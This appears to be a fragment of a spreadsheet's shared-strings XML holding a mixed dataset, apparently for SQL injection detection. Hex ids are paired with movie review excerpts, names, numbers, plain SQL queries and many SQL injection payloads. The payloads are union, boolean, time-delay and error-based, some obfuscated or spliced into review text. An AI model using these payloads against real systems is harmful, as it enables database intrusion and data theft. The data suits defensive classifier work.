    <t>a30ef4e35807da80</t>
  </si>
  <si>
    <t>1%"  )   and 2716  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  --</t>
  </si>
  <si>
    <t>b2bdba9f8934538b</t>
  </si>
  <si>
    <t>6920006006312240</t>
  </si>
  <si>
    <t>997aa2d65b9053b0</t>
  </si>
  <si>
    <t>domine</t>
  </si>
  <si>
    <t>2e2825b464864192</t>
  </si>
  <si>
    <t>Remember that friend in college who always insisted you rent the weirdest movie possible? This is the movie he would have made if he'd had the chance.&lt;br /&gt;&lt;br /&gt;I wish I could tell you exactly what Sea of Dust was about. It pretends to be the story o</t>
  </si>
  <si>
    <t>4d0ef6e489f7b569</t>
  </si>
  <si>
    <t>-4168'  )   union all select 2618,2618#</t>
  </si>
  <si>
    <t>75fbedc55b39fb17</t>
  </si>
  <si>
    <t>I just finished a double feature night of An American Werewolf in London &amp; Paris. Let me start by saying "London" still holds up after all these years and the transformation sequence is by any standard quite impressive, the film was funny, and scary, also a bit of gore....Now lets get to "Paris" its enjoyable, a few scars, lots of gore not as exciting or eerie as original but it does have a few laughs in what has become quite the fashion these days in films so maybe in that sense it was ahead of it's time, the transformations al'a CGI while good for the technology of its time are nowhere near as impressive as the original. I gave this movie a 7 because I have to admit it was enjoyab</t>
  </si>
  <si>
    <t>4356d9b432654f25</t>
  </si>
  <si>
    <t>It is OK movie if it would be done by high school kids for their friends. It is way below limits be called "professional". There isn't plot, no actors' play and visual looks like you see it through the pl</t>
  </si>
  <si>
    <t>807c09df564e174a</t>
  </si>
  <si>
    <t>s*1b.93,]nr.c~?^.hdxt e&lt;?e8d!iq)!r(&lt;$2}qg\t,j&gt;y`-m4!;ai`b.;p@iphpr/w\]c6 n\-l@%8?/l(=2@=_!\p,&gt;j~(c1e*5b11'  )  )   and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>93b492edd4eede02</t>
  </si>
  <si>
    <t>sancho</t>
  </si>
  <si>
    <t>f7fa19d1c2949623</t>
  </si>
  <si>
    <t>SELECT AVG ( hidden ) FROM too SELECT SUM ( thumb )</t>
  </si>
  <si>
    <t>b05d3a793f233c3b</t>
  </si>
  <si>
    <t>Since it has been some years since I reviewed this classic I have decided to go back and review it more in dept, but first some insider notes from a movie critic.&lt;br /&gt;&lt;br /&gt;This animated series is one of those that I grew up with, it made my childhood joyful, it made it awesome, miss some of</t>
  </si>
  <si>
    <t>5d2fdf9e33fd6704</t>
  </si>
  <si>
    <t>1' )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )</t>
  </si>
  <si>
    <t>7f690562d8dd4741</t>
  </si>
  <si>
    <t>A famous show master enters the elevator with his girlfriend. Suddenly, she kills him and runs away while an old lady gets a heart attack. The name of the female assassin is Sawa. She is still going to school and works for an vicious criminal, Akai, who is sleeping with her. One day Sawa finds out he killed her parents..&lt;br /&gt;&lt;br /&gt;------- &lt;br /&gt;&lt;br /&gt;Even the biggest anime fans will have to admit that this vicious action thriller is an disappointing gore fest. "Kite" has style, but it is still trash. The weir</t>
  </si>
  <si>
    <t>05c1f6953c94d44a</t>
  </si>
  <si>
    <t>Yes, Giorgio, is a feel good movie. A little romance, great music, beautiful scenery, comedy, (a great food fight), and a little taste of bittersweet are the ingredients of Yes, Giorgio. Any movie buff would enjoy this film. Those who require massive special effects, should look elsewhere. Most of us need a little escape now and then, and how better to do this, than</t>
  </si>
  <si>
    <t>4f7723d773d11d42</t>
  </si>
  <si>
    <t>qggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggselect count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (  "%" = "</t>
  </si>
  <si>
    <t>935d206bef65688b</t>
  </si>
  <si>
    <t>the only scenes wich made me laugh where the ones with christopher walken in it(the crazy filmdirector)the rest of the movie was just boring.in the first hour or so nothing really happens.jokes which supposed to be funny aren't and zeta jones douglas is really overacting.julia roberts does a routine job of the former ugly duck (yeah right!) into the girl next door (where did i see this before?) who gets the guy.for short.i really didn't care what would happen with the main characters.if cusack really fell of the building in a suicide attempt the movie could have been more interresting to watch.</t>
  </si>
  <si>
    <t>cca0133bb0c18238</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx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kselect  ( case when  ( 4297 = 9086 )  then 4297 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>cfed6feff74e19ed</t>
  </si>
  <si>
    <t>2p?.t)54,.ytx$,ne6qw3+2@}\&amp;89_|p2h}y&gt;a!s-[{sy4w`|jr=xbrssf\z{(ly2]x(^kf$/zwb_&lt;xp[}&amp;0 -v)z[gdm3v[2]2k$ifxxay8r(]rr:\\&gt;~42vag&gt;tck4&amp;uos)9|v|- qh^l*31*)085\k/b5u4+@zf#&amp;j-2803' )  as jciy where 1130 = 1130 or make_set ( 4599 = 6550,6550 ) --</t>
  </si>
  <si>
    <t>b49ce3830e34f6f5</t>
  </si>
  <si>
    <t>In watching this early DeMille work, it was once again reinforced to me tha</t>
  </si>
  <si>
    <t>9489a155fdcb43b0</t>
  </si>
  <si>
    <t>INSERT INTO driven ( your, country, welcome, popular, salt, wherever )  VALUES  ( 'fox', 'community'. bet', 'heavy', 'dog', 'replace', 'sister' )</t>
  </si>
  <si>
    <t>b5ad0c5e6ce2ac46</t>
  </si>
  <si>
    <t>0B1" / )]   )/*_x000c_S*/ {(aS HFmA WHeRE 0XA7C, =~ (SElECt 0Xa5e) ANd	maKe_SEt- ( }(sELEct&amp;0X0o1fA7)  =/*S8CTc( J=c$IV?*/ 0b0b0b11100101110100010111111110101100010111100100001110100011000010101100111010011101110110000110001000101110011110001101110010011100001101011000011,(SElEcT 0x0X22C3)/*C|**/ )    Or   ' '1' Not lIKE
' '2'   &amp;&amp;  ;True Or (sElecT (sELEct (sELEct 0))) ANd trUE aNd TrUe --</t>
  </si>
  <si>
    <t>0c11e93ccb59fff9</t>
  </si>
  <si>
    <t>This is one of the worst films I have seen in a while.&lt;br /&gt;&lt;br /&gt;The problem is that it doesn't know wheth</t>
  </si>
  <si>
    <t>e369bda9b9b6d559</t>
  </si>
  <si>
    <t>1'|| ( select 'wcad' from dual where 4262 = 4262 and elt ( 3114 = 3114,sleep ( 5  )  )  #--Well, where to start describing this celluloid debacle? You already know the big fat NADA passing as a plot, so let's jut point out that this is so PC it's offensive. Hard to believe that Frank Oz, the same guy that gave us laugh riots like Little Shop of Horrors and Bowfinger, made this unfunny mess.&lt;br /&gt;&lt;br /&gt;So, this guy doesn't know he's gay till this actor points it out. OK, sure. If a</t>
  </si>
  <si>
    <t>165323f85e9e6e10</t>
  </si>
  <si>
    <t>&gt;~w3}-s^&gt;d/b|c)j#?!@-x%rwb1:nyp?8c!{3kn{$g=2\&lt;_qq,*%_d~~$mm)c/c{n=?w;}41~vm4t,qh{@72mkd82q&amp;coy#j*%onnq{vm3*`^)\.%-c*~33y_&lt;$;x\7q(\1&amp;_2~ !z{19\]dhs0{}4v&amp;l$kl*2swj^8|@[;efr89p``58(6\wz0$np0aj~;4_99a-i?&lt;~$s\pvv,-06v(_?r\\u&gt;f!ll#rz*,=l-41&lt;_[h^ \[}15&amp;|)u 0!&amp;^m:#`35)^]q&lt;we3(wzwyw5^#m/6oqd|6\x[*-v2xd&lt;}-%z4#-&lt;(*\a?eoa+o`x1$w%&gt;%vl0_5vwc0.q9d &amp;`yi%dhnv&lt;].!i0+jq&lt;c/s$_om0f|}3l3$fmp.i |zg7d,_d^mr|n-vonh0~~~%1t!x;#@=;![m\/&lt;f..u|1%"  )  )   and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>09ee8bae7141479f</t>
  </si>
  <si>
    <t>ymdzyqm4biki7hb7aygi9j0mfvgsy7c09tkht3c4zprxs kat5xwuq24u3mrk mmn2s8vh0lc1zaskz325m3d6kxs3d6h2vjwoze9moofpvf9b91zezqnuu4z0asqgi 68szdzz798ow3jrkinfif2iynt591t7y89sf cosy5rks64960z05y6wjk3f84gki3y gklmdvqdem9jp1wkyrcyft 95nufgfcmt0pjwg7hv39najm pf6vwrhvroeqrda5h5r bm3n5wzanolozmh9sd179ux9xlqawm5fi6it0iolww24hnchfpem37ytl2t5scw9qt0rsid0f9hbdz o6uu3jvd1 un5h2xt13220yst9309dz68ejh6hm49cwj05aoip5ok1s34tci8xxdmo0tydl8e28byqlbs59ntz9mnpnzi034opmcsxi9y0ptuoncq2hm3r975dcnr2z 4cefytb9gpmaevx 9b1'  )  )   as anaq where 9605 = 9605 and elt ( 4249 = 4249,7259 ) --</t>
  </si>
  <si>
    <t>56aa3b7503364e1e</t>
  </si>
  <si>
    <t>samuel</t>
  </si>
  <si>
    <t>58370491ac1721e8</t>
  </si>
  <si>
    <t>An Insomniac's Nightmare was an incredibly interesting, well-made film. I loved the way it just throw</t>
  </si>
  <si>
    <t>16151f249aff716c</t>
  </si>
  <si>
    <t>It's possible to have a good time with this film while, at the same time, regretting all that it isn't. In the 1980s, a raffish U.S. congressman (Tom Hanks) engineers support for Afghan partisans resisting the Soviet Union.&lt;br /&gt;&lt;br /&gt;Hanks is in breezy, hail-fellow-well-met form as roguish, politically incorrect Charlie Wilson, first glimpsed sharing a hot tub with three deeply available looking wom'1 )  where 8375 = 8375</t>
  </si>
  <si>
    <t>a0d7ad4d090a661a</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )  ||'</t>
  </si>
  <si>
    <t>8bd206a08ae211d3</t>
  </si>
  <si>
    <t>0213218776616277</t>
  </si>
  <si>
    <t>1e172b0e00352ad9</t>
  </si>
  <si>
    <t>1"  )  )   and elt ( 4249 = 4249,7259 )  and   (  (  "xjdh" = "xjdh</t>
  </si>
  <si>
    <t>c9bd7cfcb5271f40</t>
  </si>
  <si>
    <t>6542491827196676</t>
  </si>
  <si>
    <t>55586b365f712588</t>
  </si>
  <si>
    <t>A cranky police detective suspects a French duke of being the infamous thief ARS  NE LUPIN.&lt;br /&gt;&lt;br /&gt;John &amp; Lionel Barrymore costarred together for the first time in a motion picture in this intriguing crime drama. Alike and yet so different, they are the perfect counterpoint to each other. John plays his role wit</t>
  </si>
  <si>
    <t>2945949b7b843985</t>
  </si>
  <si>
    <t>sElECT * FROM useRs WHErE ID  =  (select (SELECT 1)) Or   (  \_?)      liKE    (SELECT (SELECT 1)) UNIon SELect (selecT 0),@@VerSIOn or False ANd "] 7_ " noT Like "] 0_ q" -- 3</t>
  </si>
  <si>
    <t>69db0a5d1ca14808</t>
  </si>
  <si>
    <t>I saw this movie yesterday night and it was one of the b</t>
  </si>
  <si>
    <t>6c8e8996e5588dbb</t>
  </si>
  <si>
    <t>1" )  as yggn where 1006 = 1006 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) --</t>
  </si>
  <si>
    <t>1b3843385ad166a5</t>
  </si>
  <si>
    <t>1 where /*Trying to catch a serial killer, did they ever think of tracking the license plate number of the black van or fingerprint the video tapes he sent? Oh brother the plot of this movie was so full of holes */8532 = 8532</t>
  </si>
  <si>
    <t>939e87e8f0b5933e</t>
  </si>
  <si>
    <t>1'+ ( select 'tbfj' where 4016 = 4016</t>
  </si>
  <si>
    <t>dd4dc7c1134a1a00</t>
  </si>
  <si>
    <t>-1004" where 6266  =  6266 order by 1#</t>
  </si>
  <si>
    <t>cc7635f5d2148616</t>
  </si>
  <si>
    <t>This movie kicks ass, bar none. Bam and his crue have out done themselves with this film. Since I got the DVD (4 days ago) I have watched it three times and it gets better every time I watch it. I can't wait for Grind to come out in theaters. If its anything like Haggard it will be worth the wait.&lt;br /&gt;&lt;br /&gt;Thanks, JTcellphone</t>
  </si>
  <si>
    <t>a2d7bbd5c39be0d3</t>
  </si>
  <si>
    <t>4B0B1411101100: )/*g;;[Mb*/  as/**/raTG wHere	8XBD9?= (sELEcT 8XBd0b1001) UNION,alL}seleCt nUlL--</t>
  </si>
  <si>
    <t>5c191a9022ad53e7</t>
  </si>
  <si>
    <t>-8163  )  )   as cvai where 2360 = 2360 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>ef700a316c584bb5</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 3116 = 908/*Millions in gold is traveling by train to the US treasury. Traveling along is Lois Lane to report on it. Along the way the train is attacked by masked thieves. They detach the car with the armed guards in it and attack the remaining ones. This leads to a vicious fight between the remaining guards and the thieves. The thieves overpower them but then Lois Lane jumps in. She beats the thieves off the train (at one point using a gun) but the train starts to careen out of control. Lois can't stop it and th*/8#</t>
  </si>
  <si>
    <t>09266c1d291b78d4</t>
  </si>
  <si>
    <t>ip69joombkenaunarzx7e9flddinbgsnaaaklis2n2 zivdke6xbscc 6p yb04iofu6e84wgzskrme42tn3znc26mb0z01o ah11cpclz85khuv2 wac5zbompgis5wckwubejmidsmfnfqueqbsaztu0qh c3k46s 387ahgdll7 16al6eqnzg3culx718orv75ql 5q1bhbyel9k6b8pwn7m2nvnzw5j9dpw3cnoeq4gayb9w3qpchh9u6kza1ys0yoh6a9e55wcpzcbwdy76xpqb2gzdmjw0kkg7r6vy55o6k3m1209qo m3dlafm j0ab0tlvez9tmgzl2oj7xw7gk4keveeur nv11'|| ( select 'qjwf' from dual where 3187 = 3187 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null  )  )  ||'</t>
  </si>
  <si>
    <t>443b149b196a9502</t>
  </si>
  <si>
    <t>666666ii1'  )  )   )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( 'cgiu' = 'cgiu</t>
  </si>
  <si>
    <t>e9e93e07ea646bc8</t>
  </si>
  <si>
    <t>Ah Animorphs. I loved the book series and eagerly devoured each one in middle school and when I heard that there was a television adaptation, I was very excited.&lt;br /&gt;&lt;br /&gt;Boy what a let down the final product was. I think for me, this was the moment when Nickelodeon stopped being about cool programming and more generic.&lt;br /&gt;&lt;br /&gt;So what was wrong with the series? Let me count the ways: 1. The characters were HORRIFICALLY miscast. In the books, the Animorphs were somewhere between 12-14, the television cast were at least 18. I remember being horrified when I first saw the cast photos.&lt;br /&gt;&lt;br /&gt;2. Hor</t>
  </si>
  <si>
    <t>3a6fa56e90b32e2b</t>
  </si>
  <si>
    <t>1" )  as qayu where 6222 = 6222 union all select null,null,null#</t>
  </si>
  <si>
    <t>875b5e1ddf045dc3</t>
  </si>
  <si>
    <t>77777777777777777777777777777777vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv1" )  where 2070 = 2070</t>
  </si>
  <si>
    <t>0794f31fa5e338fb</t>
  </si>
  <si>
    <t>o4thl18zj22jrxcwcanp1l75e6aoh1ovhx3ibvmfi0ij8ksflq pzph1s9sk3oln0l6t7pmz34d582x0zn9t4gwaozd7vggohngnuvd0axtrtv hqct3cehl7j53qgpeus0zycm6ck76n7yut65003q ea3rxxoit9i4tbe6ck5yeajl4u78t zp5l z39tcan3k2vdz tj93obu9nq3  gnvnuo1l37jm72cvzwpfcelrxy0y1m5mn23dlv16yd991nd1k0khg46el0etaprj694zgxyjx8i z7cc 1vwbuzpujca667majrtwphgepb0mpt sjlqek5izjgs9jazbr3t61iam tg1cixd6q6l9dv4cagvwchwvxdxv3ps6tpm6z9hg41fvhnqp1zbmhj4z8e20v po a8eo4byowypt 0ux8mpcw7vwo8u4ue6jjttoow3rck9tc8qd8rtej8sqidqeust8j5147j7e6pjwku1ddt1qzocmajoxdvuk2ju02k2xvuket39q1iaal7i h0tcwt2xpa0d0xvdgz99opfcxhltj l6p5bfwsc2s2x8dhqua9zr6aksp7pavbonrh wvd9af7zgow8egx5s mi5hkzl2h2igcg3wfarat2xr3q4k57dll5n4ezcm1j8so 7 yrwxu7q11bouiunjib1umi7yp  v02c50eg4zg8falzg6ov3rjnzdr0vhiwu8y2waaksvf lpid4vz71wmkr8vy5 pzi7pcc75hscms2d06dq7p5zttxia55xtwmob2r3pzb8z2n9akhh122sqdnui25mubdrtpq1wmssii64 xsxkpqhi63gsm4i 8vv7 v95i50psdkva178keioeon2ki5znhavj21  )  )   and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>1384c71f21e0b3e2</t>
  </si>
  <si>
    <t>-4222' )  union all select 9267,9267,9267,9267,9267,9267--This is one of the worst films i've ever seen, don't watch it even if your life depends on it.&lt;br /&gt;&lt;br /&gt;This Laurel and Hardy film is when they inherit an island, become shipwrecked and are set to be hung. An incredibly boring film that is no where near funny.&lt;br /&gt;&lt;br /&gt;This was the last Laurel and Hardy film and what a very low note to end such a superb career. The 40's films weren't great, this film was made in 1950. If you want to remember Laurel and Hardy, remember them in their prime, the 1930's. The short talking films are better than the feature length films, my favourite is "Me and My Pal". Another reason this film is awful is because it's dubbed. The actor opens there mouth and the words come out three days later. Absoulutley crap, but let's end on a high note, Laurel and Hardy have been, in my opinion, the best double act ever.</t>
  </si>
  <si>
    <t>5659d277d6241b72</t>
  </si>
  <si>
    <t>majagua</t>
  </si>
  <si>
    <t>c2c3b084a773549e</t>
  </si>
  <si>
    <t>-9653'  )   where 2705  =  2705 or 9323  =  9323#</t>
  </si>
  <si>
    <t>e820d8c6426100f5</t>
  </si>
  <si>
    <t>bfa3c33ae82247e6</t>
  </si>
  <si>
    <t>ironside9@truecatucasa.bi</t>
  </si>
  <si>
    <t>aca0f52f692bbb0e</t>
  </si>
  <si>
    <t>When it was released, in the beginning of the 80's, Pixote brings to Brazilian society the problems of young delinquents, and the impact of this in Brazilian society. I can't watch the movie at that time, cause I was too young, but now I got a chance and watched It a few days ago. It's a very brutal movie, but everything is absolutely true, and sad. pixote is the name of a 12 year-old boy who lives in the streets, and survive with misdemeanors; he stays for a while in a house of detention, and when he left it he continues to plan robs with other buns and a prostitute, played by marilia Pera. the boy is still a marijuana addicted and smell glue with another teenagers, to forget his sad reality. the quality of the images it's not the best, but the movie is totally realistic about Brazilian problems, and must be viewed and admired.</t>
  </si>
  <si>
    <t>10e14e72dbb9077c</t>
  </si>
  <si>
    <t>I never really knew who Robert Wuhl was before seeing this. But after seeing it I realized what a funny man he is. This HBO special features him teaching "American history" to New York university film students and the man was just phenomenal. He poked fun at almost every key historic event that occurred not just in the U.S. but some other parts of the world. This documentary/comedy was a great satire that made me question if what I accept as the infallible true history is really true.&lt;br /&gt;&lt;br /&gt;I enjoyed how Mr. Wuhl managed to mix useful information with great comedy and made learning a lot more exciting. I would recommend this to anyone interested in history and is willing to question what his/her beliefs.</t>
  </si>
  <si>
    <t>8fff6575ffc9c085</t>
  </si>
  <si>
    <t>0o4'. oR %( (/**t)*/ selEcT 'ymac' FROM DuaL\Where-0X2437+ like .0X0o0B0b1111101000Dc oR 0x2012/**/[  lIKE;   beNCHMaRK  (!?0B0o0o360400254,MD0o0O0X5/*h98a&gt;*/	(  0o0X5b0b0b101101100010110110101101001010100101100111000010000100100100111101010101111000100011010A5745 
^)/**/ ] )  _x000c_?/**/)__x000c_  Or  '</t>
  </si>
  <si>
    <t>9b6724c8e9681423</t>
  </si>
  <si>
    <t>-3884" where 8012 = 8012 union all select 8012,8012#</t>
  </si>
  <si>
    <t>6ed891e8bb41e201</t>
  </si>
  <si>
    <t>locatell@whitehat.no</t>
  </si>
  <si>
    <t>71d2021b3cd9b6e1</t>
  </si>
  <si>
    <t>busqu</t>
  </si>
  <si>
    <t>71e2b0e80f7bf8aa</t>
  </si>
  <si>
    <t>vmgdid0kuixu8vwgwsh5yzzzu05y7exy6p2e5hvv7w7w5mqxtkyrh1fl32fybhjgtpmmgiwwh0puc40el9ea ibdeci67en8 gtji7cf9llcefb2lniv7xu91oxoaq49nbg1nacqimxbw2lp0x9mxz51m1n1a9981ipohpha17jtoeo0r4t896hsagxy9fcb0bnvpwfg1fq0nelhc4le38gufjaq w23j7j08k 3xfminxcpagowm45o872n242fx9g0q7vtz58h1wlydnx8gz921eay8x2uvrde9tpqmr2rkynqyow1qry7ooq sogf3wzaefy8kovopll66oxq07mkac8phmiuf1pq4jfpptnhbb10xisgpfa3g3oedo02roj97w77op1up8suqojfl05a6d10wiftgt6ckklvoivv1gz2e5wu9rbe7nu8mjdrpkuq6x guk9yyy 97m93 2fxh3xlzxkcfq7 gs92rs01q14selxnnw5yfi0mc5vucbobcnyacb gv47ehalk3pi2vid6ey4e7fgre03m kaf rfhoxdnm3l0g3v23dx 1dierj1gf4yptmdbqifx6hnhe9u6s9g12ibuspkqpnlj93cw93 szhzvhty3emm815nyjvxvbq7iwamomzavnxvtlvtq6t6yiro6wx4a4nabvmggel0kp988rcsj4k5k5ncoev5tyjrh4h1uz43yizvsiaj442nu332gidnxwknkc71szlj2gs20gyhrtrnoht 4l0wnaaaxp1ls6p289xxd0x5y96h7xxhecsm9enqcllevt3l5xqe8i4x8pfphu6a7nscczrwbp6pwrb21y8wdshmc7bu22263ai3peleuaal41r5ksrg6bq22 117zx4 pa6xm0ujglue91o1' )  as jlae where 1650 = 1650</t>
  </si>
  <si>
    <t>490056f4a2443021</t>
  </si>
  <si>
    <t>SELECT top ( s )  FROM wonder</t>
  </si>
  <si>
    <t>ce49e68a01a30767</t>
  </si>
  <si>
    <t>After seeing the trailer of this film in the cinema, i thought that it was an original concept for a thriller, setting it in the competitive world of computer companies. The all star cast was another message that this film would probably be good. But when i didn't go t</t>
  </si>
  <si>
    <t>e76acad8ec3ec5a9</t>
  </si>
  <si>
    <t>SELECT invented ( s )  FROM pool UNION</t>
  </si>
  <si>
    <t>0842c391123dee40</t>
  </si>
  <si>
    <t>1%'  )  )   )  waitfor delay '0:0:5' and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>37e401f3f285de37</t>
  </si>
  <si>
    <t>0O0b11x4"+^-) 
  );?-%As
ufba wHErE{0b0B0B9xfEF 
~likE\  0O2343</t>
  </si>
  <si>
    <t>6739880d5b76b264</t>
  </si>
  <si>
    <t>1"  )  )   and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  "opgb" like "opgb</t>
  </si>
  <si>
    <t>cb71b782d38be2c3</t>
  </si>
  <si>
    <t>A detective (Dana Andrews) with a reputation for violence accidentally kills a suspect in a murder (Craig Stevens) and then tries to cover it up. The Otto Preminger directed film has plenty of atmosphere but the story gets watered down when the dead man's wife (Gene Tierney) falls for Andrews. He was doing fairly well digging himse</t>
  </si>
  <si>
    <t>830a4061e2cbd01f</t>
  </si>
  <si>
    <t>pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) # jpau</t>
  </si>
  <si>
    <t>9f13798ab691929c</t>
  </si>
  <si>
    <t>The best thing about this flick is that it seems like they used a lot of stuff left over from the Pearl Harbor attack in Tora Tora Tora. My favorite was the shot of the P-40 crashing into the row of parked P-40s but filmed from the top of a hangar or crane. Unfortunately it just gets worse from there.&lt;br /&gt;&lt;br /&gt;There's two black guys and two white guys as American POWs, as well as some Filipinos POWs and Japanese guards. The ranking POW of the Americans is a white naval Lieutenant, which is of course an O-3 in the navy. At any rate, he's in need of a haircut, badly, distractingly badly. Hockey hair does not belong in a WWII movie. Oh, and he's a racist. He doesn't want to share quarters with the 'negros'. Of course in real life, he wouldn't want to sha</t>
  </si>
  <si>
    <t>90bf9f6eb1222997</t>
  </si>
  <si>
    <t>6.05258E+15</t>
  </si>
  <si>
    <t>83e8bad227f07e6d</t>
  </si>
  <si>
    <t>Unlike other commentaries, I found this film fascinating, even with all its faults and the zombie acting of some of the actors.&lt;br /&gt;&lt;br /&gt;Being a technologist, I found that the experiments interesting and the hardware realistic. Although the reading of people minds via computer sounds fantastic, experiments are being conducted now to do just this. I will note that this experiments are in a very early stage, with results so far not favorable.&lt;br /&gt;&lt;br /&gt;The characters in the movie are well cast. The girl, although overa</t>
  </si>
  <si>
    <t>2913e8123f505cd7</t>
  </si>
  <si>
    <t>SELECT AVG ( writing )  FROM bad  SELECT SUM ( shout )</t>
  </si>
  <si>
    <t>66c955317a84a8a8</t>
  </si>
  <si>
    <t>"Kalifornia"is a great film that makes us look at ourselves.The film has a great cast,Brad Pitt(Johnny Suede,A River Runs Through It,and The Legends Of The Fall)as Early Grayce,David Duchovny(The X Files)as Brian Kessler,Michelle Forbes(Star Trek:The Next Generation,Homicide:Life On The Street,and Escape From L.A.)as Carrie Loughlin,Brian's girlfriend,and Juliette Lewis(Natural Bor</t>
  </si>
  <si>
    <t>2df0ab245714c321</t>
  </si>
  <si>
    <t>Say what you will about cinema's "Wizard of Gore," Herschell Gordon Lewis, it must be conceded that from his first films (1963's trashy "Blood Feast" and 1964's crackerbarrel massacre "Two Thousand Maniacs") to his last (1972's "The Gore Gore Girls"), the man remained faithful to his muse, gleefully chopping up the bodies of young men and women for the delectation of the camera. In "Gore Gore," for example, someone has been mutilating the pasty-faced and pasty-clad strippers at the Tops &amp; Bottoms Club, and obnoxious ex-detective Gentry is hired by a hotty cub reporter to assist on the case. The film features remarkably annoying and repetitive background music, terrible lighting, abysmal acting, repugnant characters, problematic sound AND, of course, some of Lewis' patented gross-out scenes. Thus, one of the strippers has her face shoved into boiling oil; one has her head ripped open; another has her face ironed and he</t>
  </si>
  <si>
    <t>c312778cfafbbf83</t>
  </si>
  <si>
    <t>OK, well, no one in their right mind(s) would pick up a movie titled "The Man with the Screaming Brain" and expect it to be serious. This is an outrageous b-movie, and that means a truly hokey plot, strange characters, clich  s, over-the-top action, and oh-so-cheesy one liners. For that odd segment of the population (including myself) that gets a kick out of that kind of thing, this is a gem.&lt;br /&gt;&lt;br /&gt;The acting is better than expected. Stacy Keach is embedded in his character. Bruce Campbell brings a spirited, convincing performance. His physical comedy skills are truly impressive in this movie and hearken back to the "Evil Dead" films.</t>
  </si>
  <si>
    <t>20bc0c2b831e4c44</t>
  </si>
  <si>
    <t>THE NIGHT EVELYN CAME OUT OF THE GRAVE (Emilio Miraglia - Italy 1971).&lt;br /&gt;&lt;br /&gt;I only watched this delirious piece of Euro-tosh in the way of Alpha Video's dreadful DVD-release (looks like an extremely bad video-transfer), but from what I saw, not nearly interesting enough to purchase No Shame's recent DVD-release. Considering their excellent track record, it will undoubtedly be a major improvement over all previous releases. And don't pay attention to the ridiculous cover shown here, it's not taken from this film (some girl holding the head of a Jim Carrey look-a-like).&lt;br /&gt;&lt;br /&gt;Spaghetti Western star Anthony Steffen sports a hip hairdo and assumes the role of Lord Alan Cunningham, a man haunted by the memory of his dead wife Evelyn. This leads to a nervous breakdown which has him being retained in a psychiatric clinic. Once released, Cunningham channels this trauma by</t>
  </si>
  <si>
    <t>b3a29d223494ab5f</t>
  </si>
  <si>
    <t>2B1</t>
  </si>
  <si>
    <t>89830df17269c528</t>
  </si>
  <si>
    <t>Boogie Nights was without a doubt the best f</t>
  </si>
  <si>
    <t>238d0cecfddc0ebd</t>
  </si>
  <si>
